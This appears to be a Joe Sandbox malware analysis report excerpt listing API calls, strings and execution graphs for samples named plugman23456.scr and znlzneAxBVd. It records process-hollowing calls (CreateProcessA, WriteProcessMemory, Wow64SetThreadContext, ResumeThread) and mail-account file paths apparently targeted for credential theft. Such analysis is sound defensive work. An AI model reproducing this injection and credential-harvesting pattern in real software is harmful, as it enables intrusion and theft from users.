                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                            • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,?), ref: 10001EAC
                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                            • Part of subcall function 10001E89: lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                            • Part of subcall function 10001E89: lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                          • GetFileAttributesW.KERNEL32(?,?,?,?), ref: 1000122A
                            • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001855
                            • Part of subcall function 1000173A: _strlen.LIBCMT ref: 10001869
                          Strings
                          Similarity
                          • API ID: lstrlen$_strlenlstrcat$AttributesFile
                          • String ID: \Accounts\Account.rec0$\Data\AccCfg\Accounts.tdat$\Mail\$\Storage\
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B6C
                          • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                          Strings
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          APIs
                          • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                          • _free.LIBCMT ref: 100071B8
                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                          Similarity
                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                          • String ID:
                          APIs
                          • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                          • _free.LIBCMT ref: 10005BB4
                          • _free.LIBCMT ref: 10005BDB
                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                          Similarity
                          • API ID: ErrorLast$_free
                          • String ID:
                          APIs
                          • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                          • lstrcatW.KERNEL32(?,?), ref: 10001EAC
                          • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                          • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                          • lstrcatW.KERNEL32(?,100010DF), ref: 10001ED3
                          Similarity
                          • API ID: lstrlen$lstrcat
                          • String ID:
                          APIs
                          • _free.LIBCMT ref: 100091D0
                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                          • _free.LIBCMT ref: 100091E2
                          • _free.LIBCMT ref: 100091F4
                          • _free.LIBCMT ref: 10009206
                          • _free.LIBCMT ref: 10009218
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          APIs
                          • _free.LIBCMT ref: 1000536F
                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                          • _free.LIBCMT ref: 10005381
                          • _free.LIBCMT ref: 10005394
                          • _free.LIBCMT ref: 100053A5
                          • _free.LIBCMT ref: 100053B6
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast
                          • String ID:
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\plugman23456.scr,00000104), ref: 10004C1D
                          • _free.LIBCMT ref: 10004CE8
                          • _free.LIBCMT ref: 10004CF2
                          Strings
                          Similarity
                          • API ID: _free$FileModuleName
                          • String ID: C:\Users\user\AppData\Roaming\plugman23456.scr
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,10006FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 10008731
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 100087BA
                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 100087CC
                          • __freea.LIBCMT ref: 100087D5
                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                          Similarity
                          • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                          • String ID:
                          APIs
                          • _free.LIBCMT ref: 1000655C
                            • Part of subcall function 100062BC: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 100062BE
                            • Part of subcall function 100062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 100062E0
                            • Part of subcall function 100062BC: TerminateProcess.KERNEL32(00000000), ref: 100062E7
                          Strings
                          Similarity
                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                          • String ID: *?$.
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: _strlen
                          • String ID: : $Se.
                          • API String ID: 4218353326-4089948878
                          • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                          • Instruction ID: 66f447a9efa091531784e06c0e565222335d100d85517175c1dac28435e0d9bb
                          • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                          • Instruction Fuzzy Hash: 2F11E7B5904249AEDB11DFA8D841BDEFBFCEF09244F104056E545E7252E6706B02C765
                          APIs
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 10002903
                            • Part of subcall function 100035D2: RaiseException.KERNEL32(?,?,?,10002925,00000000,00000000,00000000,?,?,?,?,?,10002925,?,100121B8), ref: 10003632
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 10002920
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: Exception@8Throw$ExceptionRaise
                          • String ID: Unknown exception
                          • API String ID: 3476068407-410509341
                          • Opcode ID: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                          • Instruction ID: 696891806b75a506f07e96a947ab79166ff1ea0d2f17bc9dac180a151cc952bd
                          • Opcode Fuzzy Hash: 00f05d2547b3034e4c7bbe2eae49a616f435d37e9c126e5e725cfb9fdfb6d2bb
                          • Instruction Fuzzy Hash: 2BF0A47890420D77AB04E6E5EC4599D77ACDB006D0F508161FD1496499EF31FA658690
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000C.00000002.886222206.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 0000000C.00000002.886218369.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 0000000C.00000002.886222206.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_12_2_10000000_plugman23456.jbxd
                          Similarity
                          • API ID: CommandLine
                          • String ID: @-m
                          • API String ID: 3253501508-2633110488
                          • Opcode ID: f03b9bd105845c934ec86b57f4a2021404f8ac89823aaf0d7c22f7e26958660e
                          • Instruction ID: 64725d3052c2c9ae7bbd7e52e8b3a5750bb25634a918b02f39acb7dc5bcd530d
                          • Opcode Fuzzy Hash: f03b9bd105845c934ec86b57f4a2021404f8ac89823aaf0d7c22f7e26958660e
                          • Instruction Fuzzy Hash: C0B00278C012209FE744AF7499DC2487FB0B758752B90D8AFD51AD2764D635C047EF20

                          Execution Graph

                          Execution Coverage:17%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:119
                          Total number of Limit Nodes:2
                          execution_graph 10835 46a01a2 10836 46a00d4 10835->10836 10837 46a00e3 10836->10837 10841 46a25be 10836->10841 10857 46a2550 10836->10857 10872 46a2560 10836->10872 10842 46a254c 10841->10842 10844 46a25c1 10841->10844 10843 46a259e 10842->10843 10887 46a2cc0 10842->10887 10891 46a2e63 10842->10891 10896 46a2a4e 10842->10896 10901 46a3069 10842->10901 10909 46a2bf4 10842->10909 10913 46a3231 10842->10913 10917 46a2b5e 10842->10917 10922 46a2bbe 10842->10922 10927 46a299e 10842->10927 10931 46a2a9a 10842->10931 10936 46a2c64 10842->10936 10941 46a2ae7 10842->10941 10843->10837 10844->10837 10858 46a257a 10857->10858 10859 46a3069 4 API calls 10858->10859 10860 46a2a4e 2 API calls 10858->10860 10861 46a2e63 2 API calls 10858->10861 10862 46a259e 10858->10862 10863 46a2cc0 2 API calls 10858->10863 10864 46a2ae7 2 API calls 10858->10864 10865 46a2c64 2 API calls 10858->10865 10866 46a2a9a 2 API calls 10858->10866 10867 46a299e 2 API calls 10858->10867 10868 46a2bbe 2 API calls 10858->10868 10869 46a2b5e 2 API calls 10858->10869 10870 46a3231 2 API calls 10858->10870 10871 46a2bf4 2 API calls 10858->10871 10859->10862 10860->10862 10861->10862 10862->10837 10863->10862 10864->10862 10865->10862 10866->10862 10867->10862 10868->10862 10869->10862 10870->10862 10871->10862 10873 46a257a 10872->10873 10874 46a3069 4 API calls 10873->10874 10875 46a2a4e 2 API calls 10873->10875 10876 46a259e 10873->10876 10877 46a2e63 2 API calls 10873->10877 10878 46a2cc0 2 API calls 10873->10878 10879 46a2ae7 2 API calls 10873->10879 10880 46a2c64 2 API calls 10873->10880 10881 46a2a9a 2 API calls 10873->10881 10882 46a299e 2 API calls 10873->10882 10883 46a2bbe 2 API calls 10873->10883 10884 46a2b5e 2 API calls 10873->10884 10885 46a3231 2 API calls 10873->10885 10886 46a2bf4 2 API calls 10873->10886 10874->10876 10875->10876 10876->10837 10877->10876 10878->10876 10879->10876 10880->10876 10881->10876 10882->10876 10883->10876 10884->10876 10885->10876 
10886->10876 10946 17f571 10887->10946 10950 17f578 10887->10950 10888 46a2cde 10892 46a2e69 10891->10892 10954 17f800 10892->10954 10958 17f7f9 10892->10958 10893 46a2dc1 10893->10843 10897 46a2a54 10896->10897 10898 46a2ac7 10897->10898 10962 17f350 10897->10962 10966 17f358 10897->10966 10898->10843 10970 17f441 10901->10970 10974 17f448 10901->10974 10902 46a2ab3 10903 46a32d4 10902->10903 10907 17f350 ResumeThread 10902->10907 10908 17f358 ResumeThread 10902->10908 10903->10843 10904 46a2ac7 10907->10904 10908->10904 10978 17f698 10909->10978 10982 17f6a0 10909->10982 10910 46a2b2f 10910->10843 10915 17f6a0 WriteProcessMemory 10913->10915 10916 17f698 WriteProcessMemory 10913->10916 10914 46a3259 10915->10914 10916->10914 10918 46a2ab3 10917->10918 10920 17f350 ResumeThread 10918->10920 10921 17f358 ResumeThread 10918->10921 10919 46a2ac7 10920->10919 10921->10919 10923 46a2ba0 10922->10923 10924 46a2dc1 10923->10924 10925 17f800 ReadProcessMemory 10923->10925 10926 17f7f9 ReadProcessMemory 10923->10926 10924->10843 10925->10924 10926->10924 10986 17fa2c 10927->10986 10990 17fa38 10927->10990 10932 46a2ab2 10931->10932 10934 17f350 ResumeThread 10932->10934 10935 17f358 ResumeThread 10932->10935 10933 46a2ac7 10934->10933 10935->10933 10938 46a2c6a 10936->10938 10937 46a30eb 10939 17f6a0 WriteProcessMemory 10938->10939 10940 17f698 WriteProcessMemory 10938->10940 10939->10937 10940->10937 10942 46a2b01 10941->10942 10943 46a2dc1 10942->10943 10944 17f800 ReadProcessMemory 10942->10944 10945 17f7f9 ReadProcessMemory 10942->10945 10943->10843 10944->10943 10945->10943 10947 17f5bc VirtualAllocEx 10946->10947 10949 17f63a 10947->10949 10949->10888 10951 17f5bc VirtualAllocEx 10950->10951 10953 17f63a 10951->10953 10953->10888 10955 17f84c ReadProcessMemory 10954->10955 10957 17f8ca 10955->10957 10957->10893 10959 17f84c ReadProcessMemory 10958->10959 10961 17f8ca 10959->10961 10961->10893 10963 17f39c ResumeThread 10962->10963 10965 17f3ee 10963->10965 
10965->10898 10967 17f39c ResumeThread 10966->10967 10969 17f3ee 10967->10969 10969->10898 10971 17f491 Wow64SetThreadContext 10970->10971 10973 17f50f 10971->10973 10973->10902 10975 17f491 Wow64SetThreadContext 10974->10975 10977 17f50f 10975->10977 10977->10902 10979 17f6ec WriteProcessMemory 10978->10979 10981 17f78b 10979->10981 10981->10910 10983 17f6ec WriteProcessMemory 10982->10983 10985 17f78b 10983->10985 10985->10910 10987 17fabf CreateProcessA 10986->10987 10989 17fd1d 10987->10989 10991 17fabf CreateProcessA 10990->10991 10993 17fd1d 10991->10993
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 141ebbcab1f2d0eb20d670051b3d1e40b39825d472611e98a95b17a69efdc150
                          • Instruction ID: 17c82ace970ff2d37c3c2950cb46ea0e2be09719b303c0a0eb78bf8b389ce545
                          • Opcode Fuzzy Hash: 141ebbcab1f2d0eb20d670051b3d1e40b39825d472611e98a95b17a69efdc150
                          • Instruction Fuzzy Hash: C541F738949658CFCB20CF64D8547ECB7B9AB59305F0491EA840AA7392EB306ED6DF44
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 104c69e86a7bc725833a79191953697a148cf577660bce5c82cf55d92f6ffc04
                          • Instruction ID: 38c361f6dbde3e157056f6fc6d12aaa184dc7961ea25a6dc28ebe37f6f13c668
                          • Opcode Fuzzy Hash: 104c69e86a7bc725833a79191953697a148cf577660bce5c82cf55d92f6ffc04
                          • Instruction Fuzzy Hash: 4F21E738949614CFCB20DF54D9547F8B7B9AB5A315F0490DA840EA2392E730AEDADF04
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4cb70207e48ac56e6cf5e533013ad186eef94a7413c05df99cdebdbc20a66905
                          • Instruction ID: a800c7c63dd6f2d79949979914c5ce57cea562057e5dae5b70feac3749f1c5a9
                          • Opcode Fuzzy Hash: 4cb70207e48ac56e6cf5e533013ad186eef94a7413c05df99cdebdbc20a66905
                          • Instruction Fuzzy Hash: 80214A34A4A654CFCB20DF24D8547F8BBB9AB4A311F0450EAC44AA6392E734ADD6CF04
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 498e228f35157cd1c9fa42a13ca9474e25334c4ffe305b71b6b8020007996d02
                          • Instruction ID: 6f261895da574d898adfce18f5a6dfa0edbabd83cfdf8dbc984740866c224265
                          • Opcode Fuzzy Hash: 498e228f35157cd1c9fa42a13ca9474e25334c4ffe305b71b6b8020007996d02
                          • Instruction Fuzzy Hash: C4111934949654CFCB20DF64D8547ECB7B9AB5A311F0460EA840AA2392E730AED6DF44
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: afe6e2be9833605036a7629e7ff8cae403395c426925286822346f637a465e40
                          • Instruction ID: d795144a07e437fb9cd0fa3e9b43356152c8e5d4183a0aec4a14d4f0cc2e758e
                          • Opcode Fuzzy Hash: afe6e2be9833605036a7629e7ff8cae403395c426925286822346f637a465e40
                          • Instruction Fuzzy Hash: 8301213594E7958FC711CB20A8247ECBBB86B1B211F0450DAC84A963A3F6346D99CF15
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 860ab6586b204b6c337ba7865729569598457a296924fb653d3f8930ed1e1ab6
                          • Instruction ID: 10bf96e19cd74cb929cf0b6bcae74ee8fc5d835111edab81b4d2eee49c69e144
                          • Opcode Fuzzy Hash: 860ab6586b204b6c337ba7865729569598457a296924fb653d3f8930ed1e1ab6
                          • Instruction Fuzzy Hash: 6DF0FF34949654CFCB10CF64E8147FCB7B8AB5A305F0460A5940EA2312F7346DE5DF48

                          Control-flow Graph

                          control_flow_graph 42 46a25be-46a25bf 43 46a254c-46a2578 42->43 44 46a25c1-46a25dd 42->44 49 46a257a 43->49 50 46a257f-46a2595 43->50 46 46a25df 44->46 47 46a25e4-46a2775 call 46a0548 call 46a0580 44->47 46->47 63 46a2796 47->63 64 46a2777-46a2780 47->64 49->50 96 46a2598 call 46a3069 50->96 97 46a2598 call 46a2a4e 50->97 98 46a2598 call 46a2b8e 50->98 99 46a2598 call 46a2e63 50->99 100 46a2598 call 46a2a03 50->100 101 46a2598 call 46a2cc0 50->101 102 46a2598 call 46a2de0 50->102 103 46a2598 call 46a31a1 50->103 104 46a2598 call 46a2ae7 50->104 105 46a2598 call 46a2c64 50->105 106 46a2598 call 46a2a9a 50->106 107 46a2598 call 46a299e 50->107 108 46a2598 call 46a2bbe 50->108 109 46a2598 call 46a2b5e 50->109 110 46a2598 call 46a3231 50->110 111 46a2598 call 46a2bf4 50->111 56 46a259e-46a25a6 65 46a2799-46a27b3 call 46a1420 63->65 66 46a2782-46a2785 64->66 67 46a2787-46a278a 64->67 71 46a27b9 65->71 72 46a261d-46a2622 65->72 69 46a2794 66->69 67->69 69->65 75 46a27bf-46a27c3 71->75 73 46a2633-46a2641 72->73 74 46a2624-46a2625 72->74 73->75 74->73 76 46a2718-46a280d 75->76 77 46a27c9-46a27ca 75->77 79 46a26fa-46a2708 76->79 80 46a2813-46a2814 76->80 82 46a2698-46a26ac 79->82 83 46a262d-46a27fe 79->83 86 46a26ae-46a26ec 82->86 87 46a26ed-46a2804 82->87 86->87 96->56 97->56 98->56 99->56 100->56 101->56 102->56 103->56 104->56 105->56 106->56 107->56 108->56 109->56 110->56 111->56
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.401590326.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_46a0000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4,p$$p$$p
                          • API String ID: 0-3634262024
                          • Opcode ID: 24cea4a35ce72bef1b0f4ff5946fb64cb194dca86fd75bf79fbe2d58a260b2d8
                          • Instruction ID: 974b0fd361a41a9257984d65bdcdddd319b59bdc5dc2659ec4e9e78d11ac9c93
                          • Opcode Fuzzy Hash: 24cea4a35ce72bef1b0f4ff5946fb64cb194dca86fd75bf79fbe2d58a260b2d8
                          • Instruction Fuzzy Hash: B7713574E49608CFDB04CFA5D8647EDBBF5AB49300F14A0AAD405AB351E7346E56CF40

                          Control-flow Graph

                          control_flow_graph 1060 17fa2c-17fad1 1062 17fad3-17faea 1060->1062 1063 17fb1a-17fb42 1060->1063 1062->1063 1066 17faec-17faf1 1062->1066 1067 17fb44-17fb58 1063->1067 1068 17fb88-17fbde 1063->1068 1069 17fb14-17fb17 1066->1069 1070 17faf3-17fafd 1066->1070 1067->1068 1078 17fb5a-17fb5f 1067->1078 1076 17fc24-17fd1b CreateProcessA 1068->1076 1077 17fbe0-17fbf4 1068->1077 1069->1063 1071 17fb01-17fb10 1070->1071 1072 17faff 1070->1072 1071->1071 1075 17fb12 1071->1075 1072->1071 1075->1069 1096 17fd24-17fe09 1076->1096 1097 17fd1d-17fd23 1076->1097 1077->1076 1086 17fbf6-17fbfb 1077->1086 1079 17fb82-17fb85 1078->1079 1080 17fb61-17fb6b 1078->1080 1079->1068 1083 17fb6f-17fb7e 1080->1083 1084 17fb6d 1080->1084 1083->1083 1085 17fb80 1083->1085 1084->1083 1085->1079 1088 17fc1e-17fc21 1086->1088 1089 17fbfd-17fc07 1086->1089 1088->1076 1090 17fc0b-17fc1a 1089->1090 1091 17fc09 1089->1091 1090->1090 1093 17fc1c 1090->1093 1091->1090 1093->1088 1109 17fe0b-17fe0f 1096->1109 1110 17fe19-17fe1d 1096->1110 1097->1096 1109->1110 1111 17fe11 1109->1111 1112 17fe1f-17fe23 1110->1112 1113 17fe2d-17fe31 1110->1113 1111->1110 1112->1113 1114 17fe25 1112->1114 1115 17fe33-17fe37 1113->1115 1116 17fe41-17fe45 1113->1116 1114->1113 1115->1116 1117 17fe39 1115->1117 1118 17fe47-17fe70 1116->1118 1119 17fe7b-17fe86 1116->1119 1117->1116 1118->1119 1123 17fe87 1119->1123 1123->1123
                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0017FCFF
                          Memory Dump Source
                          • Source File: 0000000F.00000002.400237296.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_170000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 934f4c9a7315bfedce61f0746bde80e1be0a12991af0e18e16691d1c91f84d21
                          • Instruction ID: a9ffc68c915aa27dcad4c17089a483691d62a0dd809356cd6a5935e4b0efe308
                          • Opcode Fuzzy Hash: 934f4c9a7315bfedce61f0746bde80e1be0a12991af0e18e16691d1c91f84d21
                          • Instruction Fuzzy Hash: 28C12570D002198FDF25CFA8C855BEEBBB1BF09314F0095AAD819B7250DB749A86CF95

                          Control-flow Graph

                          control_flow_graph 1124 17fa38-17fad1 1126 17fad3-17faea 1124->1126 1127 17fb1a-17fb42 1124->1127 1126->1127 1130 17faec-17faf1 1126->1130 1131 17fb44-17fb58 1127->1131 1132 17fb88-17fbde 1127->1132 1133 17fb14-17fb17 1130->1133 1134 17faf3-17fafd 1130->1134 1131->1132 1142 17fb5a-17fb5f 1131->1142 1140 17fc24-17fd1b CreateProcessA 1132->1140 1141 17fbe0-17fbf4 1132->1141 1133->1127 1135 17fb01-17fb10 1134->1135 1136 17faff 1134->1136 1135->1135 1139 17fb12 1135->1139 1136->1135 1139->1133 1160 17fd24-17fe09 1140->1160 1161 17fd1d-17fd23 1140->1161 1141->1140 1150 17fbf6-17fbfb 1141->1150 1143 17fb82-17fb85 1142->1143 1144 17fb61-17fb6b 1142->1144 1143->1132 1147 17fb6f-17fb7e 1144->1147 1148 17fb6d 1144->1148 1147->1147 1149 17fb80 1147->1149 1148->1147 1149->1143 1152 17fc1e-17fc21 1150->1152 1153 17fbfd-17fc07 1150->1153 1152->1140 1154 17fc0b-17fc1a 1153->1154 1155 17fc09 1153->1155 1154->1154 1157 17fc1c 1154->1157 1155->1154 1157->1152 1173 17fe0b-17fe0f 1160->1173 1174 17fe19-17fe1d 1160->1174 1161->1160 1173->1174 1175 17fe11 1173->1175 1176 17fe1f-17fe23 1174->1176 1177 17fe2d-17fe31 1174->1177 1175->1174 1176->1177 1178 17fe25 1176->1178 1179 17fe33-17fe37 1177->1179 1180 17fe41-17fe45 1177->1180 1178->1177 1179->1180 1181 17fe39 1179->1181 1182 17fe47-17fe70 1180->1182 1183 17fe7b-17fe86 1180->1183 1181->1180 1182->1183 1187 17fe87 1183->1187 1187->1187
                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0017FCFF
                          Memory Dump Source
                          • Source File: 0000000F.00000002.400237296.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_170000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 3cabea93ac3a3e7c0b619d491d39d7c968a86cd06bef66eef339245696e9f69b
                          • Instruction ID: 79cc500fe2fbeace9cdb8c82043e2d105afce71608653c3cf8216340e568b4d5
                          • Opcode Fuzzy Hash: 3cabea93ac3a3e7c0b619d491d39d7c968a86cd06bef66eef339245696e9f69b
                          • Instruction Fuzzy Hash: 48C12570D002198FDF25CFA8C855BEEBBB1BF09314F0091AAD819B7250DB749A86CF95

                          Control-flow Graph

                          control_flow_graph 1188 17f698-17f70b 1190 17f722-17f789 WriteProcessMemory 1188->1190 1191 17f70d-17f71f 1188->1191 1193 17f792-17f7e4 1190->1193 1194 17f78b-17f791 1190->1194 1191->1190 1194->1193
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0017F773
                          Memory Dump Source
                          • Source File: 0000000F.00000002.400237296.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_170000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: 8e2260fa25c6211473900cab757221d7626f90baafaab91e5c380979c48e2621
                          • Instruction ID: 20788f978bec9ee2f819caeb4b8a88b86bc16c1c89ca954266733ebd677592b0
                          • Opcode Fuzzy Hash: 8e2260fa25c6211473900cab757221d7626f90baafaab91e5c380979c48e2621
                          • Instruction Fuzzy Hash: 6C41ABB5D012589FCF04CFA9D984AEEFBF1BB49314F24902AE818B7250D334AA55CF64

                          Control-flow Graph

                          control_flow_graph 1199 17f6a0-17f70b 1201 17f722-17f789 WriteProcessMemory 1199->1201 1202 17f70d-17f71f 1199->1202 1204 17f792-17f7e4 1201->1204 1205 17f78b-17f791 1201->1205 1202->1201 1205->1204
                          APIs
                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0017F773
                          Memory Dump Source
                          • Source File: 0000000F.00000002.400237296.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_170000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID: MemoryProcessWrite
                          • String ID:
                          • API String ID: 3559483778-0
                          • Opcode ID: b5496a40cabd17e64c37b3be82bcb35475199110b4ce168239c352ca22cfa341
                          • Instruction ID: 33be77c1bcf5b2c5cd722e9382f66f4b0b28c929900f31c0ff7ceca5255f18bd
                          • Opcode Fuzzy Hash: b5496a40cabd17e64c37b3be82bcb35475199110b4ce168239c352ca22cfa341
                          • Instruction Fuzzy Hash: 5E41A9B5D002589FCF04CFA9D984AEEFBF1BB49314F20902AE818B7250D734AA45CF64

                          Control-flow Graph

                          control_flow_graph 1210 17f7f9-17f8c8 ReadProcessMemory 1213 17f8d1-17f923 1210->1213 1214 17f8ca-17f8d0 1210->1214 1214->1213
                          APIs
                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0017F8B2
                          Memory Dump Source
                          • Source File: 0000000F.00000002.400237296.0000000000170000.00000040.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_170000_znlzneAxBVd.jbxd
                          Similarity
                          • API ID: MemoryProcessRead
                          • String ID:
                          • API String ID: 1726664587-0
